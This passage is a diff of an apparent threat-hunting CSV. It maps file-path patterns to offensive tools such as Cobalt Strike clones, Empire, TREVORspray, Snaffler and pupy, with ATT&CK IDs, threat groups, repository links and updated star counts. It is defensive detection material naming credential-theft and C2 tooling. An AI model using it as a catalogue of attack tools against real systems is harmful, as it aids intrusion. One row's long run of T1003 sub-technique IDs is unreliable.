APT29","C2","https://github.com/nick-frischkorn/TokenStripBOF","1","1","N/A","10","10","28","5","2022-06-15T21:29:24Z","2022-06-15T02:13:13Z" -"*/TokenTactics.git*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*/TokenTactics.git*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" "*/Tokenvator/*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" "*/tomcat-RH-root.sh*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*/tools/BeaconTool/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","224","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" -"*/tools/DHCP.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" -"*/tools/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/tools/BeaconTool/*","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","1","N/A","10","10","1038","225","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" +"*/tools/DHCP.py*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/tools/psexec.rb*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/Tools/spoolsystem/*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 
- T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Tools/Squeak/Squeak*","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","1","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "*/Tool-X.git*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. 
Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/top_mots_combo.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"*/top_mots_combo.7z*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "*/top-usernames-shortlist.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/tor-0.*.tar.gz*","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tor-consensus-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/tor-gencert.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" "*/traceroute-geolocation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/tracers_fuzzer.cc*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","113","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/tracers_fuzzer.cc*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" "*/trackerjacker*","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. 
Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007 - - TA0043","N/A","N/A","Information Gathering","https://github.com/calebmadrigal/trackerjacker","1","0","N/A","N/A","10","2537","190","2020-12-24T20:53:31Z","2016-12-18T22:01:13Z" "*/Trackflaw/CVE*.py*","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tools","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","1","99","24","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z" -"*/transports/scramblesuit/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*/TreeWalker.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD 
environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1569","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" -"*/TREVORspray.git*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*/trevorspray.log*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/transports/scramblesuit/*.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/trap_command.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/TreeWalker.cs*","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - 
T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1570","163","2023-09-18T06:38:35Z","2020-03-30T07:03:47Z" +"*/TREVORspray.git*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" +"*/trevorspray.log*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - 
loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","10","8","797","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" "*/trganda/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z" "*/trick_ryuk.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" 
"*/trickbot.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/tried_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","10","8","795","127","2023-09-15T23:01:06Z","2020-09-06T23:02:37Z" -"*/TriggerLinux/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/trollsploit/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/tried_logins.txt*","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and 